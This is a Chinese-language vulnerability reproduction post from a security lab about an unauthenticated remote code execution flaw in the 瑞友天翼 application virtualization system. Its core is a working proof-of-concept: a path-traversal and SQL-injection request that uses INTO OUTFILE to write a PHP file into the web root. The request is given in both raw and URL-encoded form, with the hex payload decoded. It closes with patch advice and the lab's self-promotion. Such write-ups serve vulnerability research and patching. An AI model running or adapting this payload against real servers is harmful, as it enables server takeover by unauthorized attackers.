日期:
来源:弥天安全实验室收集编辑:弥天安全实验室
网安引领时代,弥天点亮未来
瑞友天翼应用虚拟化系统是由西安瑞友信息技术资讯有限公司研发的具有自主知识产权的应用虚拟化平台,基于服务器计算架构。该系统可以将用户的各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过 WEB 即可快速安全地访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等功能。用户可以享受到集中、便捷、安全、高效的虚拟化功能。
该漏洞是由于瑞友天翼应用虚拟化系统存在缺陷,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。
访问系统 web 页面路径 /CASMain.XGI?cmd=About,点击关于即可查看瑞友天翼应用虚拟化系统版本。
5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1
1.访问漏洞环境
查看版本
2.对漏洞进行复现
POC
/AgentBoard.XGI?cmd=UserLogin&user=../../../../../../../../../../../../../../../../../../Windows/win.ini'||'1'+LIMIT+0,1+INTO+OUTFILE+'C:/RealFriend/Rap+Server/WebRoot/test.php'+LINES+TERMINATED+BY+0x3c3f70687020706870696e666f28293b3f3e--+-
其中0x3c3f70687020706870696e666f28293b3f3e为<?php phpinfo();?>
GET /AgentBoard.XGI?cmd=UserLogin&user=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fwin.ini%00%27%7C%7C%271%27+LIMIT+0%2C1+INTO+OUTFILE+%27C%3A%2FRealFriend%2FRap+Server%2FWebRoot%2Ftest.php%27+LINES+TERMINATED+BY+0x3c3f70687020706870696e666f28293b3f3e--+- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0
Dnt: 1
通过INTO OUTFILE写入文件,访问解析php文件。
3.xray工具测试(漏洞存在)
目前官方已发布安全更新,建议受影响用户尽快更新到安全版本: 瑞友天翼应用虚拟化系统 V7.0.3.1
http://www.realor.cn
弥天简介
学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。
口号 网安引领时代,弥天点亮未来
知识分享完了
喜欢别忘了关注我们哦~
弥 天
安全实验室